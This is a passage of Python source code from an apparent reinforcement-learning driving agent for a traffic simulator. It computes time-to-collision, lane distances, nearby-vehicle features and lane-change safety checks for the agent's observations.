shape=(1,)),\n # To make car learn to slow down, overtake or dodge\n # distance to the closest car in each lane\n \"lane_dist\": gym.spaces.Box(low=-1e10, high=1e10, shape=(5,)),\n # time to collide to the closest car in each lane\n \"lane_ttc\": gym.spaces.Box(low=-1e10, high=1e10, shape=(5,)),\n # ego lane closest social vehicle relative speed\n \"closest_lane_nv_rel_speed\": gym.spaces.Box(low=-1e10, high=1e10, shape=(1,)),\n # distance to the closest car in possible intersection direction\n \"intersection_ttc\": gym.spaces.Box(low=-1e10, high=1e10, shape=(1,)),\n # time to collide to the closest car in possible intersection direction\n \"intersection_distance\": gym.spaces.Box(low=-1e10, high=1e10, shape=(1,)),\n # intersection closest social vehicle relative speed\n \"closest_its_nv_rel_speed\": gym.spaces.Box(low=-1e10, high=1e10, shape=(1,)),\n # intersection closest social vehicle relative position in vehicle heading coordinate\n \"closest_its_nv_rel_pos\": gym.spaces.Box(low=-1e10, high=1e10, shape=(2,)),\n\n \"min_dist\": gym.spaces.Box(low=-1e10, high=1e10, shape=(2,)),\n\n \"threaten_distance\": gym.spaces.Box(low=-1e10, high=1e10, shape=(3,)),\n \"detect_car\": gym.spaces.Box(low=-1e10, high=1e10, shape=(40,)),\n }\n)\n\n\ndef heading_to_degree(heading):\n # +y = 0 rad. 
Note the 0 means up direction\n return np.degrees((heading + math.pi) % (2 * math.pi))\n\n\ndef heading_to_vec(heading):\n # axis x: right, y:up\n angle = (heading + math.pi * 0.5) % (2 * math.pi)\n return np.array([math.cos(angle), math.sin(angle)])\n\n\ndef ttc_by_path(ego, wp_paths, neighborhood_vehicle_states, ego_closest_wp):\n global lane_crash_flag\n global intersection_crash_flag\n\n # init flag, dist, ttc, headings\n lane_crash_flag = False\n intersection_crash_flag = False\n\n # default 10s\n lane_ttc = np.array([1] * 5, dtype=float)\n # default 100m\n lane_dist = np.array([1] * 5, dtype=float)\n # default 120km/h\n closest_lane_nv_rel_speed = 1\n\n intersection_ttc = 1\n intersection_distance = 1\n closest_its_nv_rel_speed = 1\n # default 100m\n closest_its_nv_rel_pos = np.array([1, 1])\n\n # here to set invalid value to 0\n wp_paths_num = len(wp_paths)\n lane_ttc[wp_paths_num:] = 0\n lane_dist[wp_paths_num:] = 0\n\n # return if no neighbour vehicle or off the routes(no waypoint paths)\n if not neighborhood_vehicle_states or not wp_paths_num:\n return (\n lane_ttc,\n lane_dist,\n closest_lane_nv_rel_speed,\n intersection_ttc,\n intersection_distance,\n closest_its_nv_rel_speed,\n closest_its_nv_rel_pos,\n )\n\n # merge waypoint paths (consider might not the same length)\n merge_waypoint_paths = []\n for wp_path in wp_paths:\n merge_waypoint_paths += wp_path\n\n wp_poses = np.array([wp.pos for wp in merge_waypoint_paths])\n\n # compute neighbour vehicle closest wp\n nv_poses = np.array([nv.position for nv in neighborhood_vehicle_states])\n nv_wp_distance = np.linalg.norm(nv_poses[:, :2][:, np.newaxis] - wp_poses, axis=2)\n nv_closest_wp_index = np.argmin(nv_wp_distance, axis=1)\n nv_closest_distance = np.min(nv_wp_distance, axis=1)\n\n # get not in same lane id social vehicles(intersect vehicles and behind vehicles)\n wp_lane_ids = np.array([wp.lane_id for wp in merge_waypoint_paths])\n nv_lane_ids = np.array([nv.lane_id for nv in neighborhood_vehicle_states])\n not_in_same_lane_id = nv_lane_ids[:, np.newaxis] != wp_lane_ids\n not_in_same_lane_id = np.all(not_in_same_lane_id, axis=1)\n\n ego_edge_id = ego.lane_id[1:-2] if ego.lane_id[0] == \"-\" else ego.lane_id[:-2]\n nv_edge_ids = np.array(\n [\n nv.lane_id[1:-2] if nv.lane_id[0] == \"-\" else nv.lane_id[:-2]\n for nv in neighborhood_vehicle_states\n ]\n )\n not_in_ego_edge_id = nv_edge_ids[:, np.newaxis] != ego_edge_id\n not_in_ego_edge_id = np.squeeze(not_in_ego_edge_id, axis=1)\n\n is_not_closed_nv = not_in_same_lane_id & not_in_ego_edge_id\n not_closed_nv_index = np.where(is_not_closed_nv)[0]\n\n # filter sv not close to the waypoints including behind the ego or ahead past the end of the waypoints\n close_nv_index = np.where(nv_closest_distance < 2)[0]\n\n if not close_nv_index.size:\n pass\n else:\n close_nv = [neighborhood_vehicle_states[i] for i in close_nv_index]\n\n # calculate waypoints distance to ego car along the routes\n wps_with_lane_dist_list = []\n for wp_path in wp_paths:\n path_wp_poses = np.array([wp.pos for wp in wp_path])\n wp_poses_shift = np.roll(path_wp_poses, 1, axis=0)\n wps_with_lane_dist = np.linalg.norm(path_wp_poses - wp_poses_shift, axis=1)\n wps_with_lane_dist[0] = 0\n wps_with_lane_dist = np.cumsum(wps_with_lane_dist)\n wps_with_lane_dist_list += wps_with_lane_dist.tolist()\n wps_with_lane_dist_list = np.array(wps_with_lane_dist_list)\n\n # get neighbour vehicle closest waypoints index\n nv_closest_wp_index = nv_closest_wp_index[close_nv_index]\n # ego car and neighbour car distance, not very 
accurate since use the closest wp\n ego_nv_distance = wps_with_lane_dist_list[nv_closest_wp_index]\n\n # get neighbour vehicle lane index\n nv_lane_index = np.array(\n [merge_waypoint_paths[i].lane_index for i in nv_closest_wp_index]\n )\n\n # get wp path lane index\n lane_index_list = [wp_path[0].lane_index for wp_path in wp_paths]\n\n for i, lane_index in enumerate(lane_index_list):\n # get same lane vehicle\n same_lane_nv_index = np.where(nv_lane_index == lane_index)[0]\n if not same_lane_nv_index.size:\n continue\n same_lane_nv_distance = ego_nv_distance[same_lane_nv_index]\n closest_nv_index = same_lane_nv_index[np.argmin(same_lane_nv_distance)]\n closest_nv = close_nv[closest_nv_index]\n closest_nv_speed = closest_nv.speed\n closest_nv_heading = closest_nv.heading\n # radius to degree\n closest_nv_heading = heading_to_degree(closest_nv_heading)\n\n closest_nv_pos = closest_nv.position[:2]\n bounding_box = closest_nv.bounding_box\n\n # map the heading to make it consistent with the position coordination\n map_heading = (closest_nv_heading + 90) % 360\n map_heading_radius = np.radians(map_heading)\n nv_heading_vec = np.array(\n [np.cos(map_heading_radius), np.sin(map_heading_radius)]\n )\n nv_heading_vertical_vec = np.array([-nv_heading_vec[1], nv_heading_vec[0]])\n\n # get four edge center position (consider one vehicle take over two lanes when change lane)\n # maybe not necessary\n closest_nv_front = closest_nv_pos + bounding_box.length * nv_heading_vec\n closest_nv_behind = closest_nv_pos - bounding_box.length * nv_heading_vec\n closest_nv_left = (\n closest_nv_pos + bounding_box.width * nv_heading_vertical_vec\n )\n closest_nv_right = (\n closest_nv_pos - bounding_box.width * nv_heading_vertical_vec\n )\n edge_points = np.array(\n [closest_nv_front, closest_nv_behind, closest_nv_left, closest_nv_right]\n )\n\n ep_wp_distance = np.linalg.norm(\n edge_points[:, np.newaxis] - wp_poses, axis=2\n )\n ep_closed_wp_index = np.argmin(ep_wp_distance, axis=1)\n ep_closed_wp_lane_index = set(\n [merge_waypoint_paths[i].lane_index for i in ep_closed_wp_index]\n + [lane_index]\n )\n\n min_distance = np.min(same_lane_nv_distance)\n\n if ego_closest_wp.lane_index in ep_closed_wp_lane_index:\n if min_distance < 6:\n lane_crash_flag = True\n\n nv_wp_heading = (\n closest_nv_heading\n - heading_to_degree(\n merge_waypoint_paths[\n nv_closest_wp_index[closest_nv_index]\n ].heading\n )\n ) % 360\n\n # find those car just get from intersection lane into ego lane\n if nv_wp_heading > 30 and nv_wp_heading < 330:\n relative_close_nv_heading = closest_nv_heading - heading_to_degree(\n ego.heading\n )\n # map nv speed to ego car heading\n map_close_nv_speed = closest_nv_speed * np.cos(\n np.radians(relative_close_nv_heading)\n )\n closest_lane_nv_rel_speed = min(\n closest_lane_nv_rel_speed,\n (map_close_nv_speed - ego.speed) * 3.6 / 120,\n )\n else:\n closest_lane_nv_rel_speed = min(\n closest_lane_nv_rel_speed,\n (closest_nv_speed - ego.speed) * 3.6 / 120,\n )\n\n relative_speed_m_per_s = ego.speed - closest_nv_speed\n\n if abs(relative_speed_m_per_s) < 1e-5:\n relative_speed_m_per_s = 1e-5\n\n ttc = min_distance / relative_speed_m_per_s\n # normalized into 10s\n ttc /= 10\n\n for j in ep_closed_wp_lane_index:\n if min_distance / 100 < lane_dist[j]:\n # normalize into 100m\n lane_dist[j] = min_distance / 100\n\n if ttc <= 0:\n continue\n\n if j == ego_closest_wp.lane_index:\n if ttc < 0.1:\n lane_crash_flag = True\n\n if ttc < lane_ttc[j]:\n lane_ttc[j] = ttc\n\n # get vehicles not in the waypoints lane\n 
if not not_closed_nv_index.size:\n pass\n else:\n filter_nv = [neighborhood_vehicle_states[i] for i in not_closed_nv_index]\n\n nv_pos = np.array([nv.position for nv in filter_nv])[:, :2]\n nv_heading = heading_to_degree(np.array([nv.heading for nv in filter_nv]))\n nv_speed = np.array([nv.speed for nv in filter_nv])\n\n ego_pos = ego.position[:2]\n ego_heading = heading_to_degree(ego.heading)\n ego_speed = ego.speed\n nv_to_ego_vec = nv_pos - ego_pos\n\n line_heading = (\n (np.arctan2(nv_to_ego_vec[:, 1], nv_to_ego_vec[:, 0]) * 180 / np.pi) - 90\n ) % 360\n nv_to_line_heading = (nv_heading - line_heading) % 360\n ego_to_line_heading = (ego_heading - line_heading) % 360\n\n # judge two heading whether will intersect\n same_region = (nv_to_line_heading - 180) * (\n ego_to_line_heading - 180\n ) > 0 # both right of line or left of line\n ego_to_nv_heading = ego_to_line_heading - nv_to_line_heading\n valid_relative_angle = (\n (nv_to_line_heading - 180 > 0) & (ego_to_nv_heading > 0)\n ) | ((nv_to_line_heading - 180 < 0) & (ego_to_nv_heading < 0))\n\n # emit behind vehicles\n valid_intersect_angle = np.abs(line_heading - ego_heading) < 90\n\n # emit patient vehicles which stay in the intersection\n not_patient_nv = nv_speed > 0.01\n\n # get valid intersection sv\n intersect_sv_index = np.where(\n same_region & valid_relative_angle & valid_intersect_angle & not_patient_nv\n )[0]\n\n if not intersect_sv_index.size:\n pass\n else:\n its_nv_pos = nv_pos[intersect_sv_index][:, :2]\n its_nv_speed = nv_speed[intersect_sv_index]\n its_nv_to_line_heading = nv_to_line_heading[intersect_sv_index]\n line_heading = line_heading[intersect_sv_index]\n # ego_to_line_heading = ego_to_line_heading[intersect_sv_index]\n\n # get intersection closest vehicle\n ego_nv_distance = np.linalg.norm(its_nv_pos - ego_pos, axis=1)\n ego_closest_its_nv_index = np.argmin(ego_nv_distance)\n ego_closest_its_nv_distance = ego_nv_distance[ego_closest_its_nv_index]\n\n line_heading = line_heading[ego_closest_its_nv_index]\n ego_to_line_heading = (\n heading_to_degree(ego_closest_wp.heading) - line_heading\n ) % 360\n\n ego_closest_its_nv_speed = its_nv_speed[ego_closest_its_nv_index]\n its_closest_nv_to_line_heading = its_nv_to_line_heading[\n ego_closest_its_nv_index\n ]\n # rel speed along ego-nv line\n closest_nv_rel_speed = ego_speed * np.cos(\n np.radians(ego_to_line_heading)\n ) - ego_closest_its_nv_speed * np.cos(\n np.radians(its_closest_nv_to_line_heading)\n )\n closest_nv_rel_speed_m_s = closest_nv_rel_speed\n if abs(closest_nv_rel_speed_m_s) < 1e-5:\n closest_nv_rel_speed_m_s = 1e-5\n ttc = ego_closest_its_nv_distance / closest_nv_rel_speed_m_s\n\n intersection_ttc = min(intersection_ttc, ttc / 10)\n intersection_distance = min(\n intersection_distance, ego_closest_its_nv_distance / 100\n )\n\n # transform relative pos to ego car heading coordinate\n rotate_axis_angle = np.radians(90 - ego_to_line_heading)\n closest_its_nv_rel_pos = (\n np.array(\n [\n ego_closest_its_nv_distance * np.cos(rotate_axis_angle),\n ego_closest_its_nv_distance * np.sin(rotate_axis_angle),\n ]\n )\n / 100\n )\n\n closest_its_nv_rel_speed = min(\n closest_its_nv_rel_speed, -closest_nv_rel_speed * 3.6 / 120\n )\n\n if ttc < 0:\n pass\n else:\n intersection_ttc = min(intersection_ttc, ttc / 10)\n intersection_distance = min(\n intersection_distance, ego_closest_its_nv_distance / 100\n )\n\n # if to collide in 3s, make it slow down\n if ttc < 2 or ego_closest_its_nv_distance < 6:\n intersection_crash_flag = True\n\n return (\n lane_ttc,\n 
lane_dist,\n        closest_lane_nv_rel_speed,\n        intersection_ttc,\n        intersection_distance,\n        closest_its_nv_rel_speed,\n        closest_its_nv_rel_pos,\n    )\n\n\ndef ego_ttc_calc(ego_lane_index, ttc_by_path, lane_dist):\n    # transform lane ttc and dist to make ego lane in the array center\n\n    # index need to be set to zero\n    # 4: [0,1], 3:[0], 2:[], 1:[4], 0:[3,4]\n    zero_index = [[3, 4], [4], [], [0], [0, 1]]\n    zero_index = zero_index[ego_lane_index]\n\n    ttc_by_path[zero_index] = 0\n    lane_ttc = np.roll(ttc_by_path, 2 - ego_lane_index)\n    lane_dist[zero_index] = 0\n    ego_lane_dist = np.roll(lane_dist, 2 - ego_lane_index)\n\n    return lane_ttc, ego_lane_dist\n\n\ndef get_distance_from_center(env_obs):\n    ego_state = env_obs.ego_vehicle_state\n    wp_paths = env_obs.waypoint_paths\n    closest_wps = [path[0] for path in wp_paths]\n\n    # distance of vehicle from center of lane\n    closest_wp = min(closest_wps, key=lambda wp: wp.dist_to(ego_state.position))\n    signed_dist_from_center = closest_wp.signed_lateral_error(ego_state.position)\n    lane_hwidth = closest_wp.lane_width * 0.5\n    norm_dist_from_center = signed_dist_from_center / lane_hwidth\n\n    return norm_dist_from_center\n\n\n# ==================================================\n# obs function\n# ==================================================\n\n\"\"\"Compute the four corner positions of the car from its position, heading and size\n\"\"\"\ndef get_ego_position(ego_position, \n                    ego_heading, \n                    ego_bounding_box):\n    # corner\n    l, h = ego_bounding_box\n    ego_heading_cosine = np.cos(-ego_heading)\n    ego_heading_sine = np.sin(-ego_heading)\n\n    ego_left_up_corner = ego_position + np.array([\n        -h / 2 * ego_heading_cosine + l / 2 * ego_heading_sine,\n        l / 2 * ego_heading_cosine - -h / 2 * ego_heading_sine]).reshape(-1)\n    ego_right_up_corner = ego_position + np.array([\n        h / 2 * ego_heading_cosine + l / 2 * ego_heading_sine,\n        l / 2 * ego_heading_cosine - h / 2 * ego_heading_sine]).reshape(-1)\n    ego_left_down_corner = ego_position + np.array([\n        -h / 2 * ego_heading_cosine + -l / 2 * ego_heading_sine,\n        -l / 2 * ego_heading_cosine - -h / 2 * ego_heading_sine]).reshape(-1)\n    ego_right_down_corner = ego_position + np.array([\n        h / 2 * ego_heading_cosine + -l / 2 * ego_heading_sine,\n        -l / 2 * ego_heading_cosine - +h / 2 * ego_heading_sine]).reshape(-1)\n\n    return np.array([ego_left_up_corner,\n                    ego_right_up_corner,\n                    ego_right_down_corner,\n                    ego_left_down_corner])\n\n\"\"\"Compute info on the 3 nearest vehicles within the 180-degree sector around us [pos_x, pos_y, speed, heading]\n\"\"\"\ndef detect_sector_car(env_obs):\n    def _cal_angle(vec):\n        if vec[1] < 0:\n            base_angle = math.pi\n            base_vec = np.array([-1.0, 0.0])\n        else:\n            base_angle = 0.0\n            base_vec = np.array([1.0, 0.0])\n\n        cos = vec.dot(base_vec) / np.sqrt(vec.dot(vec) + base_vec.dot(base_vec))\n        angle = math.acos(cos)\n        return angle + base_angle\n\n\n    def _get_closest_vehicles(ego, neighbor_vehicles, n):\n        ego_pos = ego.position[:2]\n        groups = {i: (None, 1e10) for i in range(n)}\n        partition_size = math.pi * 2.0 / n\n        # get partition\n        for v in neighbor_vehicles:\n            v_pos = v.position[:2]\n            rel_pos_vec = np.asarray([v_pos[0] - ego_pos[0], v_pos[1] - ego_pos[1]])\n            if np.linalg.norm(rel_pos_vec) < 25.:\n                # calculate its partitions\n                angle = _cal_angle(rel_pos_vec)\n                i = int(angle / partition_size)\n                dist = np.sqrt(rel_pos_vec.dot(rel_pos_vec))\n                if dist < groups[i][1]:\n                    groups[i] = (v, dist)\n\n        return groups\n\n    \n    ego_state = env_obs.ego_vehicle_state\n    neighbor_vehicle_states = env_obs.neighborhood_vehicle_states\n\n    surrounding_vehicles = _get_closest_vehicles(ego_state, neighbor_vehicle_states, 8)\n    ego_heading_vec = np.array([np.cos(-ego_state.heading), np.sin(-ego_state.heading)])\n    \n    neareat_vehicle =np.zeros((8, 5), dtype=np.float)\n    for i, v in surrounding_vehicles.items():\n        if v[0] is None:\n            continue\n        \n        v = v[0]\n        rel_pos = v.position[:2] - ego_state.position[:2]\n\n        rel_dist = np.sqrt(rel_pos.dot(rel_pos))\n        v_heading_vec = np.array([math.cos(-v.heading), math.sin(-v.heading)])\n\n        ego_heading_norm_2 = ego_heading_vec.dot(ego_heading_vec)\n        rel_pos_norm_2 = rel_pos.dot(rel_pos)\n        v_heading_norm_2 = v_heading_vec.dot(v_heading_vec)\n        ego_cosin = ego_heading_vec.dot(rel_pos) / np.sqrt(\n            ego_heading_norm_2 + rel_pos_norm_2\n        )\n\n        v_cosin = v_heading_vec.dot(rel_pos) / np.sqrt(\n            v_heading_norm_2 + rel_pos_norm_2\n        )\n\n        if ego_cosin <= 0 < v_cosin:\n            rel_speed = 0\n        else:\n            rel_speed = ego_state.speed * ego_cosin - v.speed * v_cosin\n\n        ttc = min(rel_dist / max(1e-5, rel_speed), 1e3)\n        if ttc > 10.:\n            ttc = 10.\n        neareat_vehicle[i, :] = np.array(\n            [rel_dist / 60., rel_speed / 120., ttc / 10., rel_pos[0] / 60., rel_pos[1] / 60.]\n        )\n\n    return neareat_vehicle.reshape((-1,))\n\n\"\"\"Filter and keep only the vehicles within the 180-degree sector\n\"\"\"\ndef filter_neighborhood_vehicle_states(env_obs):\n    ego_state = env_obs.ego_vehicle_state\n    ego_position = ego_state.position[:2]\n    ego_heading = ego_state.heading\n\n    vehicle_list = []\n    if env_obs.neighborhood_vehicle_states is None:\n        return []\n    else:\n        for neighborhood_vehicle_state in env_obs.neighborhood_vehicle_states:\n            neighborhood_vehicle_position = neighborhood_vehicle_state.position[:2]\n            relative_position = neighborhood_vehicle_position - ego_position\n            alpha = np.arctan2(-relative_position[0], relative_position[1])\n            if abs(alpha - ego_heading) < np.pi / 2 or abs(alpha - ego_heading) > np.pi * 1.5:\n                vehicle_list.append(neighborhood_vehicle_state)\n\n    return vehicle_list\n\n\"\"\"Check whether a wp point already intersects a neighborhood vehicle\n\"\"\"\ndef point_in_neighbor_vehicle(env_obs, point, neighborhood_vehicle_states):\n\n    if len(neighborhood_vehicle_states) == 0:\n        return False\n    else:\n        for neighborhood_vehicle_state in neighborhood_vehicle_states:\n            neighborhood_vehicle_position = neighborhood_vehicle_state.position[:2]\n            neighborhood_vehicle_heading = neighborhood_vehicle_state.heading\n            neighborhood_vehicle_bounding_box = np.array([neighborhood_vehicle_state.bounding_box.length, neighborhood_vehicle_state.bounding_box.width])\n\n            neighborhood_vehicle_corner_positions = get_ego_position(neighborhood_vehicle_position,\n                                                    neighborhood_vehicle_heading,\n                                                    neighborhood_vehicle_bounding_box,)\n\n            p = Path(neighborhood_vehicle_corner_positions)\n            if p.contains_point(point):\n                return True\n    \n    return False\n\n\n\"\"\"Check whether a lane change is safe\n\"\"\"\ndef safety_detect(env_obs, target_lane, current_lane):\n\n    def get_backward_wp(pos, heading):\n        heading_cosine = np.cos(-heading)\n        heading_sine = np.sin(-heading)\n        l = [i for i in range(13)]\n        h = 1\n\n        wp = []\n        for l_ in l:\n            wp.append(pos + np.array([\n                -h / 2 * heading_cosine + -l_ * heading_sine,\n                -l_ * heading_cosine - -h / 2 * heading_sine]).reshape(-1))\n            wp.append(pos + np.array([\n                h / 2 * heading_cosine + -l_ * heading_sine,\n                -l_ * heading_cosine - +h / 2 * heading_sine]).reshape(-1))\n        return np.array(wp)\n    \n    # If the lane is not changing, treat it as safe\n    if target_lane == current_lane:\n        return True\n\n    wp_paths = env_obs.waypoint_paths\n    if target_lane >= len(wp_paths) or current_lane >= len(wp_paths):\n        lane_list = [0]\n    else:\n        lane_list = [i for i in range(min(target_lane, current_lane), max(target_lane, current_lane)+1)]\n        lane_list.remove(current_lane)\n\n    for i in lane_list:\n        wp_pos_target_lane = wp_paths[i][0].pos\n        wp_heading_target_lane = wp_paths[i][0].heading\n        backward_wps = get_backward_wp(wp_pos_target_lane, wp_heading_target_lane)\n\n        vehicle_list = []\n        if env_obs.neighborhood_vehicle_states is None:\n            return []\n        else:\n            for neighborhood_vehicle_state in env_obs.neighborhood_vehicle_states:\n                neighborhood_vehicle_position = neighborhood_vehicle_state.position[:2]\n                if np.linalg.norm(neighborhood_vehicle_position - wp_pos_target_lane) < 20:\n                    vehicle_list.append(neighborhood_vehicle_state)\n        \n        # Backward check\n        for backward_wp in backward_wps:\n            if point_in_neighbor_vehicle(env_obs, backward_wp, vehicle_list):\n                return False\n        \n        # Forward check\n        length = len(wp_paths[i])\n        forward_wps = [ wp_paths[i][j].pos for j in range(min(12, length))]\n        for forward_wp in forward_wps:\n            if point_in_neighbor_vehicle(env_obs, forward_wp, vehicle_list):\n                return False\n\n    return True\n\n\"\"\"Compute the distance and direction of the vehicle closest to us\n\"\"\"\ndef get_min_dist(env_obs):\n\n    ego_state = env_obs.ego_vehicle_state\n    ego_position = ego_state.position[:2]\n    ego_heading = ego_state.heading\n    ego_bounding_box = np.array([ego_state.bounding_box.length,\n                                ego_state.bounding_box.width])\n\n    ego_corner = get_ego_position(ego_position, \n                                ego_heading, \n                                ego_bounding_box)\n    ego_line = LineString([ego_corner[0], \n                            ego_corner[1], \n                            ego_corner[2], \n                            ego_corner[3], \n                            ego_corner[0]])\n\n    min_dist = 5\n    min_dist_rleative_heading = 0\n    neighborhood_vehicle_states = filter_neighborhood_vehicle_states(env_obs)\n    if len(neighborhood_vehicle_states) == 0:\n        pass\n    else:\n        for neighborhood_vehicle_state in neighborhood_vehicle_states:\n            neighborhood_vehicle_position = neighborhood_vehicle_state.position[:2]\n            neighborhood_vehicle_heading = neighborhood_vehicle_state.heading\n            neighborhood_vehicle_bounding_box = np.array([neighborhood_vehicle_state.bounding_box.length, neighborhood_vehicle_state.bounding_box.width])\n\n\n            if np.linalg.norm(neighborhood_vehicle_position-ego_position) < 10.0:\n                neighborhood_vehicle_corner = get_ego_position(neighborhood_vehicle_position, \n                                                neighborhood_vehicle_heading, \n                                                neighborhood_vehicle_bounding_box)\n                \n                neighborhood_vehicle_line = LineString([neighborhood_vehicle_corner[0], \n                                                        neighborhood_vehicle_corner[1], \n                                                        neighborhood_vehicle_corner[2], \n                                                        neighborhood_vehicle_corner[3], \n                                                        neighborhood_vehicle_corner[0]])\n\n                distance = ego_line.distance(neighborhood_vehicle_line)\n                if min_dist > distance:\n                    relative_position = neighborhood_vehicle_position - ego_position\n                    alpha = np.arctan2(-relative_position[0], relative_position[1])\n                    if abs(alpha - ego_heading) < np.pi / 3 or abs(alpha - ego_heading) > np.pi * 5 / 3:\n                        if (abs(neighborhood_vehicle_heading - ego_heading) > 0.2 and abs(neighborhood_vehicle_heading - ego_heading) < (np.pi*2 - 0.2)) or \\\n                            (ego_state.lane_id == neighborhood_vehicle_state.lane_id):\n                            min_dist = distance\n                            min_dist_rleative_heading = alpha\n\n    return min_dist, min_dist_rleative_heading\n\n\n\"\"\"Compute each vehicle's intent\n\"\"\"\ndef threaten_via_intent(env_obs, max_len_index):\n    def get_neighborhood_wp(pos, heading, speed):\n        heading_cosine = np.cos(-heading)\n        heading_sine = np.sin(-heading)\n\n        # Forward computation\n        l = [i for i in range(15+int(speed*2))]\n        h = 0.8\n\n        wp = []\n        for l_ in l:\n            wp.append((pos + np.array([\n                -h / 2 * heading_cosine + l_ / 2 * heading_sine,\n                l_ / 2 * heading_cosine - -h / 2 * heading_sine]).reshape(-1)).reshape(1, -1))\n            wp.append((pos + np.array([\n                h / 2 * heading_cosine + l_ / 2 * heading_sine,\n                l_ / 2 * heading_cosine - h / 2 * heading_sine]).reshape(-1)).reshape(1, -1))\n        \n        # Backward computation (so that this vehicle's size is included)\n        l = [i for i in range(1, 4)]\n        for l_ in l:\n            wp.append((pos + np.array([\n                -h / 2 * heading_cosine + -l_ / 2 * heading_sine,\n                -l_ / 2 * heading_cosine - -h / 2 * heading_sine]).reshape(-1)).reshape(1, -1))\n            wp.append((pos + np.array([\n                h / 2 * heading_cosine + -l_ / 2 * heading_sine,\n                -l_ / 2 * heading_cosine - h / 2 * heading_sine]).reshape(-1)).reshape(1, -1))\n        \n        return np.concatenate(wp, axis=0)\n    \n    def get_ego_forward_wp(wps, max_i=20):\n        l = 0.05\n        h = 0.8\n\n        forward_wps = []\n        i = 1\n        for wp in wps:\n            heading_cosine = np.cos(-wp.heading)\n            heading_sine = np.sin(-wp.heading)\n            pos = wp.pos\n\n            forward_wps.append((pos + np.array([\n                -h / 2 * heading_cosine + l / 2 * heading_sine,\n                l / 2 * heading_cosine - -h / 2 * heading_sine]).reshape(-1)).reshape(1, -1))\n            forward_wps.append((pos + np.array([\n                h / 2 * heading_cosine + l / 2 * heading_sine,\n                l / 2 * heading_cosine - h / 2 * heading_sine]).reshape(-1)).reshape(1, -1))\n\n            i += 1\n            if i > max_i:\n                break\n        \n        return np.concatenate(forward_wps, axis=0)\n\n    def get_min_value_and_index(matrix, limit=2.0):\n        shape = matrix.shape[0]\n        for i in range(shape):\n            if matrix[i] < limit:\n                return matrix[i], i // 2\n            \n            if i == shape-1:\n                return 10, 20\n\n\n    ego_state = env_obs.ego_vehicle_state\n    ego_position = ego_state.position[:2]\n    ego_heading = ego_state.heading\n    if max_len_index >= len(env_obs.waypoint_paths):\n        max_len_index = len(env_obs.waypoint_paths) - 1\n    ego_path = env_obs.waypoint_paths[max_len_index]\n    ego_forward_wps = get_ego_forward_wp(ego_path)\n\n    intend_min_index_min = 20\n    intend_min_index_head_min = 20\n    intend_min_index_teal_min = 20\n    if env_obs.neighborhood_vehicle_states is None:\n        return []\n    else:\n        for neighborhood_vehicle_state in env_obs.neighborhood_vehicle_states:\n            neighborhood_vehicle_position = neighborhood_vehicle_state.position[:2]\n            if np.linalg.norm(neighborhood_vehicle_position - ego_position) < 30:\n                \"\"\"Compute the shortest distance to vehicles in our own lane\n                \"\"\"\n                if ego_state.lane_id == neighborhood_vehicle_state.lane_id:\n                    relative_position = neighborhood_vehicle_position - ego_position\n                    alpha = np.arctan2(-relative_position[0], relative_position[1])\n\n                    # Shortest distance ahead\n                    if abs(alpha - ego_heading) < np.pi / 2 or abs(alpha - ego_heading) > np.pi * 1.5:\n                        neighborhood_vehicle_heading = neighborhood_vehicle_state.heading\n                        neighborhood_vehicle_speed = neighborhood_vehicle_state.speed\n\n                        neighborhood_forward_wps = get_neighborhood_wp(neighborhood_vehicle_position,\n                                                        neighborhood_vehicle_heading,\n                                                        neighborhood_vehicle_speed)\n                        \n                        intent_distance = np.linalg.norm(ego_forward_wps[:, np.newaxis] - neighborhood_forward_wps, axis=-1)\n                        intent_distance = np.min(intent_distance, axis=-1)\n                        intend_min_distance, intend_min_index = get_min_value_and_index(intent_distance, limit=2.0)\n\n                        if intend_min_distance < 2.0:\n                            if intend_min_index < intend_min_index_head_min:\n                                intend_min_index_head_min = intend_min_index \n                    \n                    # Shortest distance behind\n                    else:\n                        distance = np.linalg.norm(relative_position)\n                        if distance < intend_min_index_teal_min:\n                            intend_min_index_teal_min = distance\n\n                    continue\n\n\n                neighborhood_vehicle_heading = neighborhood_vehicle_state.heading\n                neighborhood_vehicle_speed = neighborhood_vehicle_state.speed\n\n                neighborhood_forward_wps = get_neighborhood_wp(neighborhood_vehicle_position,\n                                                neighborhood_vehicle_heading,\n                                                neighborhood_vehicle_speed)\n                \n                intent_distance = np.linalg.norm(ego_forward_wps[:, np.newaxis] - neighborhood_forward_wps, axis=-1)\n                intent_distance = np.min(intent_distance, axis=-1)\n                intend_min_distance, intend_min_index = get_min_value_and_index(intent_distance, limit=2.0)\n\n                if intend_min_distance < 2.0:\n                    # Exclude cars behind us (our prior: if one is about to hit us from behind, slowing down is pointless anyway) (but the very close ones still need excluding)\n                    relative_position = neighborhood_vehicle_position - ego_position\n                    alpha = np.arctan2(-relative_position[0], relative_position[1])\n                    if not(abs(alpha - ego_heading) < np.pi / 2 or abs(alpha - ego_heading) > np.pi * 1.5):\n                        continue\n\n                    # Exclude vehicles more than one lane away from us\n                    if ego_state.lane_id.split('_')[0] == neighborhood_vehicle_state.lane_id.split('_')[0] \\\n                        and abs(ego_state.lane_index - neighborhood_vehicle_state.lane_index) > 1:\n                        continue\n                    \n                    # Exclude stationary vehicles\n                    if neighborhood_vehicle_state.speed < 0.05:\n                        continue\n\n                    if intend_min_index < intend_min_index_min:\n                        intend_min_index_min = intend_min_index\n    \n    # The smaller this number, the more dangerous\n    threaten_level = 1.\n    if intend_min_index_min > 20:\n        threaten_level = 1.\n    else:\n        threaten_level = float(intend_min_index_min / 20)\n\n    head_threaten_level = 1.\n    if intend_min_index_head_min > 20:\n        head_threaten_level = 1.\n    else:\n        head_threaten_level = float(intend_min_index_head_min / 20)\n\n    teal_threaten_level = 1.\n    if intend_min_index_teal_min > 20:\n        teal_threaten_level = 1.\n    else:\n        teal_threaten_level = float(intend_min_index_teal_min / 20)\n    \n    return threaten_level, head_threaten_level, teal_threaten_level\n    \n\"\"\"Compute the waypoint path the car should follow\n\"\"\"\ndef get_max_index_lane(env_obs):\n    global global_max_len_lane_index\n\n    if env_obs.distance_travelled == 0.0:\n        global_max_len_lane_index = 0\n\n    wp_paths = env_obs.waypoint_paths\n    wp_paths_len = len(wp_paths)\n\n    wps_len = [len(path) for path in wp_paths]\n    max_len_lane_index = np.argmax(wps_len)\n    max_len = np.max(wps_len)\n    max_count = wps_len.count(max_len)\n\n    if max_count == 1:\n\n        if safety_detect(env_obs, max_len_lane_index, env_obs.ego_vehicle_state.lane_index):\n            global_max_len_lane_index = max_len_lane_index\n            return max_len_lane_index\n        else:\n            if global_max_len_lane_index >= wp_paths_len:\n                global_max_len_lane_index = wp_paths_len - 1\n            return global_max_len_lane_index\n\n    # Only consider lanes adjacent to 